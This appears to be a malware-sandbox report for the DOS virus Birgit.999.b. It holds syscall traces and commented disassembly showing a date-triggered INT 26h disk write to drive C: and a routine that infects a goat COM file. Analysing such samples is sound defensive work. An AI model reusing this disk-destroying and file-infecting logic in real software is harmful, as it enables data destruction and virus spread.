Sample viewer

vx.netlux.org/Virus.DOS.Birgit.999.b


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window shown with the "Get date" row (syscall op 42 = INT 21h AH=2Ah).
; "PC" is the address the interrupt returns to, so the first instruction below runs
; right after the date has been read. This is a straight-line decode: the call at
; 0x12bb3 targets 0x12bbb, which is not an instruction start in this listing, so the
; bytes around 0x12bb8-0x12bbb are probably data or decoded out of alignment.
2018-12-17T22:51:38.586249596Z 42 PC: 12ba6 | Get date 0x12ba6: cmp dl, 0x12 ; DL = day of month from Get date; the trigger day is 0x12 (18)
0x12ba9: jne 0x12bb2 ; any other day: skip the payload below
0x12bab: mov cx, 0xffff ; INT 26h sector count (on DOS 4+ 0xFFFF selects the parameter-packet form instead)
0x12bae: mov al, 2 ; INT 26h drive number: 2 = C:
0x12bb0: int 0x26 ; DOS absolute disk write -> date-triggered destructive payload; DX / DS:BX are not set in the visible lines
0x12bb2: popaw ; restore the general registers (matching pushaw is outside this window)
0x12bb3: call 0x12bbb ; target falls between listed instructions (see header note)
0x12bb6: jmp 0x12be8 ; continues outside this window
0x12bb8: nop ; NOTE(review): 0x12bb8-0x12bba look like data / misaligned decode - unconfirmed
0x12bb9: pop ss
0x12bba: pushaw
0x12bbc: mov dx, word ptr ds:[bp + 0x136] ; load the word kept at bp+0x136 (written from DX after "Get time" at 0x12c04)
0x12bc1: jmp 0x12bc8 ; step over the terminate stub at 0x12bc4
0x12bc3: nop
0x12bc4: mov ah, 0x4c ; INT 21h AH=4Ch: terminate process (AL is not set in the visible lines)
0x12bc6: int 0x21
0x12bc8: mov cx, 0x7c ; 0x7c = 124, which equals the number of consecutive IOCTL rows at PC 12be3 that follow
0x12bcb: lea si, word ptr [bp + 0x165] ; source pointer into the bp-relative body
0x12bcf: mov di, si ; destination = source, i.e. an in-place pass; presumably a decrypt loop keyed by DX - TODO confirm
0x12bd1: int3 ; listing ends here; whether 0xCC is a real byte of the sample or a tool artefact cannot be told from this page
2018-12-17T22:51:38.588538456Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.589767443Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.591059692Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.592268014Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.594410944Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.595748401Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.597161934Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.598998227Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.600185459Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.601508322Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.603600112Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.605433157Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.607339156Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.609912859Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.611301156Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.612694737Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.614113747Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.622283574Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.624058505Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.62609395Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.62854308Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.6303587Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.632261094Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.635367859Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.637305192Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.63929672Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.642195772Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.658611214Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.66036078Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.663139676Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.664728998Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.666215657Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.66786217Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.670050017Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.671704226Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.673370501Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.675734572Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.677377192Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.67920462Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.681510913Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.683447169Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.685356728Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.68795409Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.689953027Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.691943294Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.694863702Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.69647679Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.698177466Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.701427405Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.703153447Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.704775864Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.70640202Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.708656391Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.710289062Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.711912386Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.714462902Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.716395676Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.718312867Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.720599037Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.722729252Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.724633687Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.727344461Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.729596315Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.731531702Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.733659961Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.751695305Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.753337764Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.754945897Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.757403616Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.758973186Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.760299561Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.762188954Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.764328624Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.766184218Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.768474262Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.770409421Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.77224343Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.774734802Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.776531544Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.778384578Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.78088009Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.782890753Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.784880404Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.786872129Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.789876511Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.791973944Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.793997638Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.797264574Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.799443793Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.801605373Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.80458224Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.80660814Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.808612926Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.811603634Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.81320164Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.815989708Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.818599315Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.82031643Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.821965645Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.824366461Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.826505417Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.828765481Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.831051336Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.833522094Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.835707354Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.837887878Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.841186693Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.843373378Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.845532527Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.848587141Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.851119892Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.853343511Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.85624696Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.85870349Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.860891665Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.863547673Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.865800899Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.867981037Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.870162266Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.873388977Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.875563123Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.877720441Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.880889046Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-17T22:51:38.8830961Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
; Disassembly window shown with the "Get time" row (syscall op 44 = INT 21h AH=2Ch).
; It covers the start of the file-infection path; the trace rows that follow
; (Find first file, two attribute calls, Open file 'SLEEP.COM') correspond to the
; INT 21h calls below. All data references are bp-relative, which presumably means
; bp holds the body's load offset - TODO confirm.
2018-12-17T22:51:38.885349927Z 44 PC: 12c04 | Get time 0x12c04: mov word ptr ds:[bp + 0x136], dx ; keep DX from Get time (seconds/hundredths) at bp+0x136; the same slot is read at 0x12bbc
0x12c09: jmp 0x12c0b ; jumps to the very next instruction; no effect on control flow
0x12c0b: mov ax, 0x4e00 ; INT 21h AH=4Eh: find first matching file
0x12c0e: mov cx, 0 ; attribute mask 0: ordinary files only
0x12c11: lea dx, word ptr [bp + 0x1e8] ; DS:DX -> search pattern stored in the body (contents not visible here)
0x12c15: int 0x21
0x12c17: jae 0x12c1c ; carry clear: a file was found
0x12c19: jmp 0x12d1f ; nothing found: leave for 0x12d1f (outside this window)
0x12c1c: push 0x4300 ; AX = 4300h built via push/pop instead of a plain mov
0x12c1f: pop ax ; INT 21h AX=4300h: get file attributes
0x12c20: mov dx, 0x9e ; DS:009Eh = file-name field of the default DTA (PSP:80h + 1Eh) filled in by find-first
0x12c23: int 0x21
0x12c25: mov word ptr ds:[bp + 0x349], cx ; save the victim's original attributes
0x12c2a: mov ax, 0x4301 ; INT 21h AX=4301h: set file attributes
0x12c2d: mov cx, 0 ; clear every attribute, which removes read-only protection before the write
0x12c30: int 0x21
0x12c32: mov ax, 0x3d02 ; INT 21h AH=3Dh, AL=2: open for read/write
0x12c35: mov dx, 0x9e ; same DTA file name as above
0x12c38: int 0x21
0x12c3a: push ax ; keep the returned file handle (handle 5 in the rows that follow)
2018-12-17T22:51:38.888678595Z 78 PC: 12c17 | Find first file
2018-12-17T22:51:38.895626356Z 67 PC: 12c25 | Get or set file attributes
2018-12-17T22:51:38.902307986Z 67 PC: 12c32 | Get or set file attributes
2018-12-17T22:51:38.920770661Z 61 PC: 12c3a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:51:38.928469511Z 63 PC: 12c49 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:51:38.935954816Z 87 PC: 12c94 | Get or set file date and time
2018-12-17T22:51:38.938464981Z 66 PC: 12ca7 | Move file pointer
2018-12-17T22:51:38.940337581Z 64 PC: 12cb4 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T22:51:38.943632019Z 64 PC: 12cd3 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T22:51:38.947744691Z 64 PC: 12ce0 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T22:51:38.957658946Z 66 PC: 12ceb | Move file pointer
2018-12-17T22:51:38.959995511Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.963042786Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.965545674Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.967686179Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.970605134Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.973088175Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.975241087Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.978257101Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.980766441Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.982919624Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.986950853Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.989648419Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.991808525Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.993997783Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.996881376Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:38.999026869Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.001118848Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.00383094Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.0057829Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.007934386Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.011073855Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.013244074Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.015386721Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.018513247Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.020663865Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.022773425Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.025698834Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.02811358Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.03019606Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.032956943Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.03499235Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.037020953Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.039880878Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.042331691Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.04447061Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.047102027Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.062711119Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.064683321Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.066896141Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.069023762Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.071046069Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.085899443Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.088504968Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.090467037Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.094850824Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.097282451Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.099291033Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.101518159Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.104233956Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.10728517Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.109721818Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.111986135Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.114353316Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.116372625Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.119026265Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.120735275Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.122384008Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.125113815Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.127614472Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.129747154Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.133340079Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.135674872Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.137729011Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.140500077Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.142735992Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.144903763Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.148182356Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.150336962Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.152451072Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.155654248Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.157748371Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.159850782Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.163038634Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.165178645Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.16730515Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.170766638Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.173260146Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.175410389Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.178824958Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.181287692Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.183400129Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.186293235Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.188759395Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.190887889Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.193821849Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.196301969Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.198437379Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.20161756Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.203861652Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.206005295Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.208960619Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.212201322Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.214791073Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.216490474Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.219268296Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.221829667Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.223571001Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.226300564Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.228128161Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.229916183Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.232410794Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.234212455Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.236183073Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.239311807Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.241364989Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.243300231Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.246165259Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.248440658Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.250367359Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.253114327Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.255333337Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.257252639Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.260008506Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.262244282Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.264163568Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.269625613Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.271867034Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.274230551Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.276375236Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.27916645Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.28150584Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.2834282Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.286402871Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.288325409Z 68 PC: 12be3 | I/O control for devices (Set for = '�')
2018-12-17T22:51:39.29024084Z 64 PC: 12cfb | Write file or device (Write 999 bytes on handle 5)
2018-12-17T22:51:39.301118465Z 87 PC: 12d0c | Get or set file date and time
2018-12-17T22:51:39.302831297Z 62 PC: 12d11 | Close file
2018-12-17T22:51:39.320100097Z 67 PC: 12d1f | Get or set file attributes
2018-12-17T22:51:39.33205977Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T22:51:39.337000878Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10628,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window shown with the "Get date" row (syscall op 42 = INT 21h AH=2Ah)
; of a separate run dated 2018-12-25; the instructions are the same as in the
; earlier run's window. "PC" is the interrupt's return address. The decode is
; straight-line: the call at 0x12bb3 targets 0x12bbb, which is not an instruction
; start here, so the bytes around 0x12bb8-0x12bbb are probably data or misaligned.
2018-12-25T12:28:38.554387408Z 42 PC: 12ba6 | Get date 0x12ba6: cmp dl, 0x12 ; DL = day of month from Get date; the trigger day is 0x12 (18)
0x12ba9: jne 0x12bb2 ; any other day: skip the payload below
0x12bab: mov cx, 0xffff ; INT 26h sector count (on DOS 4+ 0xFFFF selects the parameter-packet form instead)
0x12bae: mov al, 2 ; INT 26h drive number: 2 = C:
0x12bb0: int 0x26 ; DOS absolute disk write -> date-triggered destructive payload; DX / DS:BX are not set in the visible lines
0x12bb2: popaw ; restore the general registers (matching pushaw is outside this window)
0x12bb3: call 0x12bbb ; target falls between listed instructions (see header note)
0x12bb6: jmp 0x12be8 ; continues outside this window
0x12bb8: nop ; NOTE(review): 0x12bb8-0x12bba look like data / misaligned decode - unconfirmed
0x12bb9: pop ss
0x12bba: pushaw
0x12bbc: mov dx, word ptr ds:[bp + 0x136] ; load the word kept at bp+0x136
0x12bc1: jmp 0x12bc8 ; step over the terminate stub at 0x12bc4
0x12bc3: nop
0x12bc4: mov ah, 0x4c ; INT 21h AH=4Ch: terminate process (AL is not set in the visible lines)
0x12bc6: int 0x21
0x12bc8: mov cx, 0x7c ; loop count 0x7c = 124; the IOCTL rows at PC 12be3 follow this window
0x12bcb: lea si, word ptr [bp + 0x165] ; source pointer into the bp-relative body
